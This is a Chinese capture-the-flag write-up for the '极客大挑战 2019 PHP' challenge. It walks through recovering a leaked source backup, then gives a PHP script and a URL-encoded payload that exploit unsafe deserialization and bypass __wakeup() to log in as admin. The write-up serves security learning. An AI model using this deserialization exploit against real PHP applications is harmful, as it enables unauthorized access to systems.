[极客大挑战 2019]PHP

简介: [极客大挑战 2019]PHP

打开

发现有一个提示,良好网站备份,一般情况下是拿dirsearch扫的。但是我的dirsearch扫buu都是429,头大呢。

看别的师傅的wp,扫除一个www.zip,源码如下。

以及

分析一下:

第一张图片说我们应该get上去一个select。

第二张图片和我说让我改username=admin,password=100。然后绕过__wakeup()

Exp:

<?php
 
class Name{
 
    private $username = '11111';
 
    private $password = '22222';
 
    public function __construct($username,$password){
 
        $this->username = $username;
 
        $this->password = $password;
 
    }
 
}
 
$j17 = new Name('admin','100');
 
$a=serialize($j17);
 
$a=str_replace(':2:',':3:',$a);//绕过wakeup
 
echo urlencode($a);
 
?>

payload:


/?Select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

目录
相关文章
|
4月前
|
存储 安全 PHP
网安之PHP基础练习
本博文,主要是对自己在学校PHP基础第5节课后,对作业题目的题解,学习和使用php其实这对于后续漏洞挖掘与发现利用很大的帮助,现在在很多网站都还在使用php在做网站搭建的一部分.所以学习和利用还是很有用必要的.在进行题目练习的过程中,发现自己对于学习过的html知识点,开始出现了遗忘,然后进行自己查询资料,并一点一点进行题目的完成,自己也有很多的收获,在做完后,给了自己很多的继续学习下去的动力,发现php是一门很有趣的编程语言.
|
存储 缓存 Oracle
PHP为什么会被认为是草根语言?
以下文字并没有非常多的技术词汇,所以只要对PHP感兴趣的人都可以看看。
118 0
|
PHP 开发者
【第二届PHP全球开发者大会】惠新宸(鸟哥):PHP7性能之源
5月14-15日的第二届2016PHP全球开发者大会在北京国际会议中心举行。国内最有影响力的PHP技术专家、新浪微博任平台及数据部总架构师兼首席PHP顾问惠新宸(“鸟哥”)做了题为《PHP7性能之源》的演讲,通过与PHP5中的检查机制、JIT编译器、WP等相对比,详解PHP7的性能提升的奥秘。
4852 0
|
PHP 开发者 Go
PHP还有前途吗?
PHP是不是已经走到了尽头?这是近年来的一个热门话题,毕竟有很多互联网企业都在尝试推出其他开发语言,并且吸引了相当多的关注。例如Go以协程著称,Java则有着最完善的生态,而Python则在人工智能领域保持优势。
2121 0
|
监控 关系型数据库 PHP
PHP技术月刊第1期:使用 Phan 为你的 PHP 项目保驾护航
云栖社区“世界上最好的编程语言”——PHP开始发布技术月刊啦。PHP技术月刊将会为大家介绍最新的PHP技术与动态、预告活动、最热问答以及技术直播等,欢迎大家订阅。
2236 0